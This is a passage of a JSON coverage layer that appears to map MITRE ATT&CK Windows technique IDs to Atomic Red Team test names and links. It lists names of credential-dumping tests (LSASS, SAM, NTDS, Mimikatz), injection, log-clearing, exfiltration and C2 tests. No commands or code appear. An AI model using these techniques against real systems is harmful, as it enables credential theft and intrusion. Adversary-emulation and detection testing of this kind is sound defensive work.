ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump 
volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path 
(PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate 
Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic 
script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- 